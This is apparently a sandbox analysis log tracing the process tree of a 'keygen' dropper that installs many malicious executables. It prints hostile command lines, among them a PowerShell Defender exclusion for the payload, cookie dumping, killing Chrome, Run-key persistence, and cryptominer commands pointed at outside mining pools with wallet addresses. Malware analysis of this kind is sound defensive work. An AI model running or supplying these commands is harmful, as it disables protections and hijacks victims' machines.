C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe" 1 3.1617537381.6069a9656ec0a 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe" 2 3.1617537381.6069a9656ec0a7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious use of AdjustPrivilegeToken
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\vkirkc44ft0\dteryuxm5so.exe"C:\Users\Admin\AppData\Local\Temp\vkirkc44ft0\dteryuxm5so.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:5572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dteryuxm5so.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\vkirkc44ft0\dteryuxm5so.exe" & exit9⤵PID:5772
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dteryuxm5so.exe" /f10⤵
- Kills process with taskkill
PID:5092
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\t1bmtbbse0y\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\t1bmtbbse0y\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5588 -
C:\Users\Admin\AppData\Local\Temp\is-LFDHT.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-LFDHT.tmp\Setup3310.tmp" /SL5="$1031A,138429,56832,C:\Users\Admin\AppData\Local\Temp\t1bmtbbse0y\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5688 -
C:\Users\Admin\AppData\Local\Temp\is-PKHJB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PKHJB.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6040 -
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5844 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4632
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3600
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2188 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 94812⤵
- Program crash
PID:7184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 100812⤵
- Program crash
PID:7896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 101612⤵
- Program crash
PID:6528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 117612⤵
- Program crash
PID:5348
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 119212⤵
- Program crash
PID:7872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 120812⤵
- Program crash
PID:6236
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 151212⤵
- Program crash
PID:6832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 156412⤵
- Program crash
PID:7036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 157612⤵
- Program crash
PID:7868
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 176812⤵
- Program crash
PID:1416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 184412⤵
- Program crash
PID:7852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 183612⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6232
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5184
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5520 -
C:\Users\Admin\AppData\Local\Temp\is-7CU35.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-7CU35.tmp\LabPicV3.tmp" /SL5="$203AE,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6128 -
C:\Users\Admin\AppData\Local\Temp\is-Q630G.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-Q630G.tmp\ppppppfy.exe" /S /UID=lab21413⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:5464 -
C:\Program Files\Windows Sidebar\WFHQQRLPVR\prolab.exe"C:\Program Files\Windows Sidebar\WFHQQRLPVR\prolab.exe" /VERYSILENT14⤵
- Suspicious use of SetWindowsHookEx
PID:5016 -
C:\Users\Admin\AppData\Local\Temp\is-UQBLM.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-UQBLM.tmp\prolab.tmp" /SL5="$20276,575243,216576,C:\Program Files\Windows Sidebar\WFHQQRLPVR\prolab.exe" /VERYSILENT15⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3016
-
-
-
C:\Users\Admin\AppData\Local\Temp\f4-5b61b-794-f828a-51224a3ffa445\Fumeqifise.exe"C:\Users\Admin\AppData\Local\Temp\f4-5b61b-794-f828a-51224a3ffa445\Fumeqifise.exe"14⤵PID:1952
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ivgaigu.yhr\md6_6ydj.exe & exit15⤵PID:6564
-
C:\Users\Admin\AppData\Local\Temp\5ivgaigu.yhr\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\5ivgaigu.yhr\md6_6ydj.exe16⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:7376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rs2y1zci.nua\askinstall31.exe & exit15⤵PID:7312
-
C:\Users\Admin\AppData\Local\Temp\rs2y1zci.nua\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\rs2y1zci.nua\askinstall31.exe16⤵
- Suspicious use of SetWindowsHookEx
PID:7948 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:4644
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:5852
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wugt3w4h.aoz\toolspab1.exe & exit15⤵PID:7940
-
C:\Users\Admin\AppData\Local\Temp\wugt3w4h.aoz\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\wugt3w4h.aoz\toolspab1.exe16⤵
- Suspicious use of SetThreadContext
PID:6940 -
C:\Users\Admin\AppData\Local\Temp\wugt3w4h.aoz\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\wugt3w4h.aoz\toolspab1.exe17⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7320
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qxnlz3e4.04c\GcleanerWW.exe /mixone & exit15⤵PID:6892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\itjpn0sl.vmk\setup_10.2_mix.exe & exit15⤵PID:1848
-
C:\Users\Admin\AppData\Local\Temp\itjpn0sl.vmk\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\itjpn0sl.vmk\setup_10.2_mix.exe16⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m0b1eboy.ufl\file.exe & exit15⤵PID:7364
-
C:\Users\Admin\AppData\Local\Temp\m0b1eboy.ufl\file.exeC:\Users\Admin\AppData\Local\Temp\m0b1eboy.ufl\file.exe16⤵
- Suspicious use of SetWindowsHookEx
PID:5276 -
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵PID:5088
-
C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵
- Drops file in Windows directory
PID:4244 -
C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe" 1 3.1617537651.6069aa73329d5 10119⤵
- Adds Run key to start application
PID:5996 -
C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe" 2 3.1617537651.6069aa73329d520⤵
- Checks for any installed AV software in registry
PID:7392 -
C:\Users\Admin\AppData\Local\Temp\0jtvurl4wn1\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\0jtvurl4wn1\cpyrix.exe" /VERYSILENT21⤵PID:4608
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:8964 -
C:\Users\Admin\AppData\Local\Temp\5e441c5f-59e3-4ba9-b1da-1a24280ec78a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5e441c5f-59e3-4ba9-b1da-1a24280ec78a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5e441c5f-59e3-4ba9-b1da-1a24280ec78a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run23⤵PID:8484
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5e441c5f-59e3-4ba9-b1da-1a24280ec78a\test.bat"24⤵PID:4816
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force23⤵PID:6244
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV124⤵PID:8788
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 123⤵PID:816
-
C:\Windows\SysWOW64\timeout.exetimeout 124⤵
- Delays execution with timeout.exe
PID:7072
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"23⤵PID:6396
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵
- Suspicious use of SetThreadContext
PID:5980 -
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵PID:7960
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵PID:8748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qditsxdj5pd\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\qditsxdj5pd\Setup3310.exe" /Verysilent /subid=57721⤵PID:9092
-
C:\Users\Admin\AppData\Local\Temp\is-8SQK9.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-8SQK9.tmp\Setup3310.tmp" /SL5="$30690,138429,56832,C:\Users\Admin\AppData\Local\Temp\qditsxdj5pd\Setup3310.exe" /Verysilent /subid=57722⤵PID:4384
-
C:\Users\Admin\AppData\Local\Temp\is-PAS12.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PAS12.tmp\Setup.exe" /Verysilent23⤵PID:1804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kcl5lx3txad\awqz0osyxp5.exe"C:\Users\Admin\AppData\Local\Temp\kcl5lx3txad\awqz0osyxp5.exe" /ustwo INSTALL21⤵PID:6204
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "awqz0osyxp5.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\kcl5lx3txad\awqz0osyxp5.exe" & exit22⤵PID:6332
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "awqz0osyxp5.exe" /f23⤵
- Kills process with taskkill
PID:4364
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\j4rzlf2zrsx\app.exe"C:\Users\Admin\AppData\Local\Temp\j4rzlf2zrsx\app.exe" /8-2321⤵PID:1760
-
-
C:\Users\Admin\AppData\Local\Temp\wzrvret2gv1\vict.exe"C:\Users\Admin\AppData\Local\Temp\wzrvret2gv1\vict.exe" /VERYSILENT /id=53521⤵PID:2864
-
C:\Users\Admin\AppData\Local\Temp\is-JL95N.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-JL95N.tmp\vict.tmp" /SL5="$405E0,870426,780800,C:\Users\Admin\AppData\Local\Temp\wzrvret2gv1\vict.exe" /VERYSILENT /id=53522⤵PID:5640
-
C:\Users\Admin\AppData\Local\Temp\is-OJ4K9.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-OJ4K9.tmp\win1host.exe" 53523⤵PID:7060
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\G853KSTUVC\setups.exe"C:\Users\Admin\AppData\Local\Temp\G853KSTUVC\setups.exe" ll18⤵PID:7016
-
C:\Users\Admin\AppData\Local\Temp\is-C7CBE.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-C7CBE.tmp\setups.tmp" /SL5="$A059E,454998,229376,C:\Users\Admin\AppData\Local\Temp\G853KSTUVC\setups.exe" ll19⤵PID:7396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"17⤵PID:7560
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵PID:6540
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
PID:7472
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"17⤵
- Drops file in Program Files directory
- Modifies registry class
PID:2504 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:7900
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:7756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵PID:4072
-
C:\Users\Admin\AppData\Roaming\CEFA.tmp.exe"C:\Users\Admin\AppData\Roaming\CEFA.tmp.exe"18⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:8132 -
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:8788
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵
- Blocklisted process makes network request
PID:8304 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵
- Executes dropped EXE
PID:6104
-
-
-
-
C:\Users\Admin\AppData\Roaming\DDA1.tmp.exe"C:\Users\Admin\AppData\Roaming\DDA1.tmp.exe"18⤵PID:3324
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"18⤵PID:8388
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:9016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"17⤵
- Checks whether UAC is enabled
PID:8620
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i0z0lr0n.q42\app.exe /8-2222 & exit15⤵PID:6396
-
C:\Users\Admin\AppData\Local\Temp\i0z0lr0n.q42\app.exeC:\Users\Admin\AppData\Local\Temp\i0z0lr0n.q42\app.exe /8-222216⤵PID:6992
-
C:\Users\Admin\AppData\Local\Temp\i0z0lr0n.q42\app.exe"C:\Users\Admin\AppData\Local\Temp\i0z0lr0n.q42\app.exe" /8-222217⤵PID:928
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rastiva1.tjj\Four.exe & exit15⤵PID:6608
-
C:\Users\Admin\AppData\Local\Temp\rastiva1.tjj\Four.exeC:\Users\Admin\AppData\Local\Temp\rastiva1.tjj\Four.exe16⤵PID:8040
-
C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵
- Drops file in Windows directory
PID:8600 -
C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe" 1 3.1617537699.6069aaa350250 10418⤵
- Adds Run key to start application
PID:8492 -
C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe" 2 3.1617537699.6069aaa35025019⤵
- Checks for any installed AV software in registry
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\q1ub213rf3e\ckv5eewanrr.exe"C:\Users\Admin\AppData\Local\Temp\q1ub213rf3e\ckv5eewanrr.exe" /ustwo INSTALL20⤵PID:7548
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ckv5eewanrr.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\q1ub213rf3e\ckv5eewanrr.exe" & exit21⤵PID:6420
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV122⤵PID:7796
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ckv5eewanrr.exe" /f22⤵
- Kills process with taskkill
PID:6516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tkipmz1u3at\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\tkipmz1u3at\Setup3310.exe" /Verysilent /subid=57720⤵PID:8048
-
C:\Users\Admin\AppData\Local\Temp\is-T43RE.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-T43RE.tmp\Setup3310.tmp" /SL5="$20482,138429,56832,C:\Users\Admin\AppData\Local\Temp\tkipmz1u3at\Setup3310.exe" /Verysilent /subid=57721⤵PID:7564
-
C:\Users\Admin\AppData\Local\Temp\is-OCVBE.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OCVBE.tmp\Setup.exe" /Verysilent22⤵PID:9152
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ja0vrfhjbs0\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ja0vrfhjbs0\cpyrix.exe" /VERYSILENT20⤵PID:5916
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵
- Adds Run key to start application
PID:8876 -
C:\Users\Admin\AppData\Local\Temp\b944e9b6-2326-4ec7-a8ac-b94e9e6d12a6\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\b944e9b6-2326-4ec7-a8ac-b94e9e6d12a6\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\b944e9b6-2326-4ec7-a8ac-b94e9e6d12a6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run22⤵PID:9100
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b944e9b6-2326-4ec7-a8ac-b94e9e6d12a6\test.bat"23⤵PID:400
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force22⤵PID:8524
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 122⤵PID:3708
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵
- Suspicious use of SetThreadContext
PID:64 -
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵PID:7500
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵PID:6448
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4tiyqrj00uh\vict.exe"C:\Users\Admin\AppData\Local\Temp\4tiyqrj00uh\vict.exe" /VERYSILENT /id=53520⤵PID:5400
-
C:\Users\Admin\AppData\Local\Temp\is-2SR2D.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-2SR2D.tmp\vict.tmp" /SL5="$3047E,870426,780800,C:\Users\Admin\AppData\Local\Temp\4tiyqrj00uh\vict.exe" /VERYSILENT /id=53521⤵PID:6920
-
C:\Users\Admin\AppData\Local\Temp\is-CCDF7.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-CCDF7.tmp\win1host.exe" 53522⤵PID:8592
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0tzvyzca4gj\app.exe"C:\Users\Admin\AppData\Local\Temp\0tzvyzca4gj\app.exe" /8-2320⤵PID:3972
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SKV9L3XJRM\setups.exe"C:\Users\Admin\AppData\Local\Temp\SKV9L3XJRM\setups.exe" ll17⤵PID:2216
-
C:\Users\Admin\AppData\Local\Temp\is-B0PR2.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-B0PR2.tmp\setups.tmp" /SL5="$40304,454998,229376,C:\Users\Admin\AppData\Local\Temp\SKV9L3XJRM\setups.exe" ll18⤵PID:8700
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a3-49a69-8fa-e07bc-a797644b648d1\Cyshagebacu.exe"C:\Users\Admin\AppData\Local\Temp\a3-49a69-8fa-e07bc-a797644b648d1\Cyshagebacu.exe"14⤵PID:4528
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 203215⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:5132
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5912 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:5580
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:8
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5328 -
C:\Users\Admin\AppData\Local\Temp\is-7CU36.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-7CU36.tmp\lylal220.tmp" /SL5="$203AA,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6048 -
C:\Users\Admin\AppData\Local\Temp\is-6A0JG.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-6A0JG.tmp\Microsoft.exe" /S /UID=lylal22013⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:416 -
C:\Program Files\7-Zip\XSMGUVJZXB\irecord.exe"C:\Program Files\7-Zip\XSMGUVJZXB\irecord.exe" /VERYSILENT14⤵
- Suspicious use of SetWindowsHookEx
PID:5660 -
C:\Users\Admin\AppData\Local\Temp\is-MIC38.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-MIC38.tmp\irecord.tmp" /SL5="$60370,6265333,408064,C:\Program Files\7-Zip\XSMGUVJZXB\irecord.exe" /VERYSILENT15⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:984
-
-
-
C:\Users\Admin\AppData\Local\Temp\c8-93eec-c15-63f97-b9f78dbe5336d\Jaelashagify.exe"C:\Users\Admin\AppData\Local\Temp\c8-93eec-c15-63f97-b9f78dbe5336d\Jaelashagify.exe"14⤵
- Modifies Internet Explorer settings
PID:4148 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\inpsnpxa.jvh\md6_6ydj.exe & exit15⤵PID:5528
-
C:\Users\Admin\AppData\Local\Temp\inpsnpxa.jvh\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\inpsnpxa.jvh\md6_6ydj.exe16⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:7856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yri44wxp.h3u\askinstall31.exe & exit15⤵PID:7796
-
